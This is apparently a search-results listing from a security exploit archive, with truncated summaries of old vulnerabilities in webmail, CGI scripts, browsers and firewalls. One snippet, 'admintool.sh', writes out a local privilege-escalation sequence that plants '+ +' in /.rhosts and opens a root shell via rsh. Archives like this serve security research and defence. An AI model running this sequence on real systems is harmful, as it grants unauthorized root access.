69 matches found
Endymion MailMan 3.0.x - Arbitrary Command Execution
source: https://www.securityfocus.com/bid/2063/info A vulnerability exists in 3.x versions of Endymion MailMan Webmail prior to release 3.0.26. The widely-used Perl script provides a web-email interface. Affected versions make insecure use of the perl open function. Attackers can control the way...
FreeBSD-SA-00:64.global
-----BEGIN PGP SIGNED MESSAGE----- ============================================================================= FreeBSD-SA-00:64 Security Advisory FreeBSD, Inc. Topic: global port allows remote compromise through CGI script Category: ports Module: global Announced: 2000-11-06 Credits: Shigio...
Unixware 7.0 - SCOhelp HTTP Server Format String
source: https://www.securityfocus.com/bid/1717/info SCO Unixware 7 default installation includes scohelp, an http server that listens on port 457/tcp and allows access to manual pages and other documentation files. The search CGI script provided for that purpose has a vulnerability that could all...
srcgrab.pl.txt
Subject: Re: Translate:f summary, history and thoughts Simple perl script exploit for the problem. Please find a simple perl script included at the bottom that exploits below described problem. ----- Original Message ----- From: "Daniel Doèekal" To: Sent: Tuesday, August 15, 2000 7:39 PM Subject:...
Hughes Technologies Mini SQL (mSQL) 2.0/2.0.10 - Information Disclosure
source: https://www.securityfocus.com/bid/591/info Under certain versions of Mini SQL, the w3-msql CGI script allows users to view directories which are set for private access via .htaccess files. W3-mSQL converts any form data passed to a script into global Lite variables and these variables can...
netscape.4.x-javascript-unix.txt
Date: Thu, 29 Oct 1998 17:09:23 -0600 From: Ryan Gray To: [email protected] Subject: Re: Javascript bug in Netscape Communicator 4.5 Hello, Just wanted to add that Netscape Communicator 4.5b2 on Slackware Linux 3.5 kernel 2.0.34 is susceptible to this also. I was able to get the script to read...
admintool.sh
setenv DISPLAY yourdisplay:0.0 ln -s /.rhosts /tmp/.group.lock /usr/bin/admintool browse - group - edit a group - get an error message - exit echo "+ +" .rhosts /usr/bin/rsh localhost -l root "/usr/openwin/bin/xterm&"...
cuartango-msie.txt
Cuartango security Hole http://pages.whowhere.com/computers/cuartangojc/cuartangoh1.html Affected software Microsoft Internet Explorer 4 Microsoft Internet Explorer 5 Preview Risks Major : Your computer files can be sent to a WEB site by a malicious Script if the file name is known. Technical...
IBM AIX eNetwork Firewall 3.2/3.3 - Insecure Temporary File Creation
soure: https://www.securityfocus.com/bid/287/info IBM's eNetwork Firewall for AIX contains a number of vulnerability in scripts which manipulate files insecurely. When fwlsuser script is run it creates a temporary file called /tmp/fwlsuser.PID where PID is the process ID of the command being run...